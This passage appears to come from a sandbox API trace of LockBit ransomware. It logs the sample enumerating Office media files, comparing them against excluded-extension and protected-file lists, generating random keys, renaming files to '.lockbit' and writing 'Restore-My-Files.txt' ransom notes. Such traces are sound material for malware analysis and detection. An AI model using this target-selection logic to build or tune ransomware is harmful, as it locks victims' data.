lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.191] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.194] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.194] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.194] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.194] free (_Block=0x1fa2ed8) [0204.194] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.194] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.194] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.194] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4107e200, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4107e200, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21308_.GIF", cAlternateFileName="")) returned 1 [0204.194] lstrcmpiW (lpString1=".", lpString2="BD21308_.GIF") returned -1 [0204.194] lstrcmpiW (lpString1="..", lpString2="BD21308_.GIF") returned -1 [0204.194] PathFindExtensionW (pszPath="BD21308_.GIF") returned=".GIF" [0204.195] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.195] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.195] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21308_.GIF") returned 1 [0204.196] lstrcmpiW (lpString1="ntldr", lpString2="BD21308_.GIF") returned 1 [0204.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21308_.GIF") returned 1 [0204.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21308_.GIF") returned 1 [0204.196] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21308_.GIF") returned -1 [0204.196] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21308_.GIF") returned 1 [0204.196] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21308_.GIF") returned 1 [0204.196] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.196] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF") returned=".GIF" [0204.196] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.196] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.196] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.197] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.197] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.197] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF.lockbit") returned 78 [0204.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21308_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.198] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.198] malloc (_Size=0x40068) returned 0x3df0008 [0204.198] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=983) returned 1 [0204.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.199] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.204] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.204] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.204] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.204] free (_Block=0x1fa2ed8) [0204.204] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.204] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.204] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ea58800, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3ea58800, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21310_.GIF", cAlternateFileName="")) returned 1 [0204.204] lstrcmpiW (lpString1=".", lpString2="BD21310_.GIF") returned -1 [0204.204] lstrcmpiW (lpString1="..", lpString2="BD21310_.GIF") returned -1 [0204.204] PathFindExtensionW (pszPath="BD21310_.GIF") returned=".GIF" [0204.204] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.204] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.204] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.205] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.205] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.205] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.205] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.205] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.205] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21310_.GIF") returned 1 [0204.205] lstrcmpiW (lpString1="ntldr", lpString2="BD21310_.GIF") returned 1 [0204.205] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21310_.GIF") returned 1 [0204.205] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21310_.GIF") returned 1 [0204.205] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21310_.GIF") returned -1 [0204.206] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21310_.GIF") returned 1 [0204.206] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21310_.GIF") returned 1 [0204.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF") returned=".GIF" [0204.206] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.206] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.206] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.206] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF.lockbit") returned 78 [0204.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21310_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.208] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.208] malloc (_Size=0x40068) returned 0x3df0008 [0204.208] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=980) returned 1 [0204.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.209] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.212] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.212] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.212] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.212] free (_Block=0x1fa2ed8) [0204.212] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.213] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.213] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c432e00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3c432e00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21312_.GIF", cAlternateFileName="")) returned 1 [0204.213] lstrcmpiW (lpString1=".", lpString2="BD21312_.GIF") returned -1 [0204.213] lstrcmpiW (lpString1="..", lpString2="BD21312_.GIF") returned -1 [0204.213] PathFindExtensionW (pszPath="BD21312_.GIF") returned=".GIF" [0204.213] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.213] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.213] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.214] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.214] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.214] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 